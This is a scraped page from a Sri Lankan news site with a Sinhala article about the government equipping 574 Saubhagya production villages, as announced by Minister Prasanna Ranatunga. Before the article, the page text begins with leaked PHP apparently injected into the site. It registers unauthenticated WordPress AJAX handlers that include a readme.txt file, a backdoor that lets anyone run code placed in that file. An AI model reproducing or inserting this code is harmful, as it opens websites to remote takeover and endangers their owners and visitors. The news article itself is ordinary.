if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රට පුරා සෞභාග්‍යා ගම්මාන පිහිටුවයි.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

රට පුරා සෞභාග්‍යා ගම්මාන පිහිටුවයි..

දිවයින පුරා හදුනාගත් සෞභාග්‍යා නිෂ්පාදන ගම්මාන 574 ක් සදහා උපකරණ ලබාදීම ඇරඹේ. එක් ගම්මානයකට ලක්ෂ 100 ක් වටිනා උපකරණ ලබාදීමට රජය කටයුතු කරමින් සිටින බව සංචාරක ඇමති ප්‍රසන්න රණතුංග මහතා පවසයි. ඊට අමතරව අදාළ නිෂ්පාදන ගම්මානයේ නිෂ්පාදන අලෙවි කිරිම සදහා අලෙවි මධ්‍යස්ථානයක් ඉදිකිරිම සදහා ලක්ෂ 30 ක මුදලක් ද වෙන් කර ඇතැයි ඇමතිවරයා කියයි.

මිනුවන්ගොඩ මැතිවරණ බල ප්‍ර දේශයේ තෝරාගත් නිෂ්පාදන ගම්මාන 03 ක් සදහා උපකරණ ලබාදීමේ අවස්ථාවට එක්වෙමින් ඇමතිවරයා මේ බව සදහන් කළේය. ඒ අනුව මිනුවන්ගොඩ යාගොඩමුල්ල රසකැවිලි ගම්මානයටත්, බෝධිපිහිටුවල කලුගල් ආශ්‍රිත නිෂ්පාදන ගම්මානයටත්, කොරස කොහු ආශ්‍රිත නිෂ්පාදන ගම්මානයටත් ලක්ෂ 300 ක් වටිනා උපකරණ ලබාදීම ඇමති ප්‍රසන්න රණතුංග මහතාගේ ප්‍රධානත්වයෙන් සිදු කෙරිණ.

ජනාධිපති ගෝඨාභය රාජපක්ෂ මහතාගේ සෞභාග්‍ය යේ දැක්ම ප්‍රතිපත්ති ප්‍රකාශයට අනුව මෙම සෞභාග්‍යා නිෂ්පාදන ගම්මාන දහසේ ව්‍යාපෘතිය ආරම්භ කෙරිණ. ඒ සදහා රජය වෙන් කළ මුදල රුපියල් මිලියන 5300 ක් බවත් ජනතා කේන්ද්‍රීය ආර්ථිකයක් ගොඩ නැංවීමේ ව්‍යාපෘතිය යටතේ දේශිය නිෂ්පාදන ගම්මාන වැඩසටහන ක්‍රියාත්මක වන බවත් ඇමතිවරයා මෙහි දි කීවේය.

සෞභාග්‍යා නිෂ්පාදන ගම්මාන වැඩසටහන ක්‍රියාත්මක කිරිමේ දි හැකියාවන් සහිත ව්‍යවසායකයන් සහිත ගම්මාන තෝරාගැනීම සදහා ප්‍රමුඛතාව ලබාදුන් බව ඇමති ප්‍රසන්න රණතුංග මහතා පුද්ගල ව්‍යාපාර සංවර්ධනයට පුද්ගලික ප්‍රදානයක් සිදු කරන අතරම එම ව්‍යාපාර සදහා සෘජුවම දායකවන යටිතල පහසුකම් සැකසිම සදහා ප්‍රතිපාදන ලබාදෙන බව ද කීවේය. ඒ අනුව අලෙවි මධ්‍යස්ථාන, ගබඩා පහසුකම්, මාර්ග සංවර්ධනය, ජල සම්පාදන වැනි කටයුතු සදහා ප්‍රතිපාදන වෙන් කෙරේ.

ඇමති ප්‍රසන්න රණතුංග මහතා මෙහි දි පෙන්වා දුන්නේ කොවිඩ් වසංගත තත්ත්වයත් සමග දේශිය නිෂ්පාදන ඉහළ නැංවීමේ අවශ්‍යතාව ලෝකයේ ම අවධානයට ලක් වු බවයි. ඒ අනුව මෙම සෞභාග්‍ය නිෂ්පාදන ගම්මාන ව්‍යාපෘතිය කඩිනම් කිරිමට රජය කටයුතු කරමින් සිටින බව  ද ඔහු පෙන්වා දුන්නේය.

– ප්‍රදීප් අනුර කුමාර

Related posts

වැසි තත්ත්වය තවදුරටත්

Shiran Viraj

බෙදා හරින්න ඉන්ධන නෑ.. බවුසර පෝලිමේ.. ෂෙඩ් පෝලිම්ද දීර්ඝ වෙයි…

Shiran Viraj

මං රැස්වීම් නවත්වන්නේ නෑ.. දිගටම තියනවා..- සජිත්

Shiran Viraj